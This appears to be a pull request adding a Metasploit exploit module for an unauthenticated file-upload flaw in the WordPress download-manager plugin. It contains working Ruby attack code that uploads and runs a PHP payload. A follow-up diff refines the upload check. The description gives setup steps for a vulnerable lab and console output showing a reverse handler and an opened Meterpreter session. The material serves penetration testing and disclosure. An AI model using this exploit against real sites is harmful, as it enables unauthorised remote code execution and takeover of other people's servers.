### PR TITLE
add wordpress download-manager exploit

### DIFF
--- a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb
+++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb
@@ -1,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+    info,
+    'Name'           => 'Wordpress Download Manager (download-manager) Unauthenticated File Upload',
+    'Description'    => %q{
+      The WordPress download-manager plugin contains multiple unauthenticated file upload
+      vulnerabilities which were fixed in version 2.7.5.
+    },
+    'Author'         =>
+    [
+      'Mickael Nadeau',     # initial discovery
+      'Christian Mehlmauer' # metasploit module
+    ],
+    'License'        => MSF_LICENSE,
+    'References'     =>
+    [
+      # The module exploits another vuln not mentioned in this post, but was also fixed
+      ['URL', 'http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html'],
+      ['WPVDB', '7706']
+    ],
+    'Privileged'     => false,
+    'Platform'       => ['php'],
+    'Arch'           => ARCH_PHP,
+    'Targets'        => [['download-manager < 2.7.5', {}]],
+    'DefaultTarget'  => 0,
+    'DisclosureDate' => 'Dec 3 2014'))
+    end
+
+    def check
+      check_plugin_version_from_readme('download-manager', '2.7.5')
+    end
+
+    def exploit
+      filename = "#{rand_text_alpha(10)}.php"
+
+      data = Rex::MIME::Message.new
+      data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{filename}\"")
+      post_data = data.to_s
+
+      print_status("#{peer} - Uploading payload")
+      res = send_request_cgi(
+        'method'   => 'POST',
+        'uri'      => normalize_uri(wordpress_url_backend, 'post.php'),
+        'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+        'data'     => data.to_s,
+        'vars_get' => { 'task' => 'wpdm_upload_files' }
+      )
+
+      if res && res.code == 200 && res.body && res.body.length > 0 && res.body !~ /filename.+\.php$/
+        uploaded_filename = res.body
+        register_files_for_cleanup(uploaded_filename)
+        print_status("#{peer} - File #{uploaded_filename} successfully uploaded")
+      else
+        print_error("#{peer} - Error on uploading file")
+        return
+      end
+
+      file_path = normalize_uri(target_uri, 'wp-content', 'uploads', 'download-manager-files', uploaded_filename)
+
+      print_status("#{peer} - Calling uploaded file #{file_path}")
+      send_request_cgi(
+        'uri'    => file_path,
+        'method' => 'GET'
+      )
+    end
+  end

--- a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb
+++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'vars_get' => { 'task' => 'wpdm_upload_files' }
       )
 
-      if res && res.code == 200 && res.body && res.body.length > 0 && res.body !~ /filename.+\.php$/
+      if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/
         uploaded_filename = res.body
         register_files_for_cleanup(uploaded_filename)
         print_status("#{peer} - File #{uploaded_filename} successfully uploaded")


### PR DESCRIPTION
This module exploits the current file upload in the WordPress download-manager plugin.

Steps to verify:
- [x] Install Wordpress https://www.firefart.at/how-to-install-wordpress/
- [x] Get the vulnerable plugin:

```
git clone https://github.com/wp-plugins/download-manager.git /var/www/wordpress/wp-content/plugins/download-manager
cd /var/www/wordpress/wp-content/plugins/download-manager
git checkout d775be087d955ebc4427b3e504f58c6355b6067e
```

or download my packaged version here
https://mega.co.nz/#!L9oRFBaY!w3n4NG92e9oo99bQcDVYoDrAWNhC1h0Fvjq__iZxqpg

(the developer did not tag his versions so there is no official download link)
Code changes to fix this bug to verify the commit hash:
https://github.com/wp-plugins/download-manager/commit/4d1f2a7a5cd944c9f43a6ccd231c2285f74f951e
- [ ] Activate the plugin and run the exploit

Output:

```
msf exploit(wp_downloadmanager_upload) > info

       Name: Wordpress Download Manager (download-manager) Unauthenticated File Upload
     Module: exploit/unix/webapp/wp_downloadmanager_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-12-03

Provided by:
  Mickael Nadeau
  Christian Mehlmauer <FireFart@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   download-manager < 2.7.5

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        Use a proxy chain
  RHOST      10.211.55.39     yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The WordPress download-manager plugin contains multiple 
  unauthenticated file upload vulnerabilities which were fixed in 
  version 2.7.5.

References:
  http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html
  https://wpvulndb.com/vulnerabilities/7706

msf exploit(wp_downloadmanager_upload) > check
[*] 10.211.55.39:80 - The target service is running, but could not be validated.
msf exploit(wp_downloadmanager_upload) > run

[*] Started reverse handler on 10.211.55.2:4444 
[*] 10.211.55.39:80 - Uploading payload
[*] 10.211.55.39:80 - File 1417739892wpdm_FtWAbEhxPR.php successfully uploaded
[*] 10.211.55.39:80 - Calling uploaded file /wp-content/uploads/download-manager-files/1417739892wpdm_FtWAbEhxPR.php
[*] Sending stage (40551 bytes) to 10.211.55.39
[*] Meterpreter session 3 opened (10.211.55.2:4444 -> 10.211.55.39:45245) at 2014-12-05 11:15:46 +0100
[+] Deleted 1417739892wpdm_FtWAbEhxPR.php

meterpreter > sysinfo
Computer    : wordpress
OS          : Linux wordpress 3.13.0-37-generic #64-Ubuntu SMP Mon Sep 22 21:28:38 UTC 2014 x86_64
Meterpreter : php/php
meterpreter > 
```
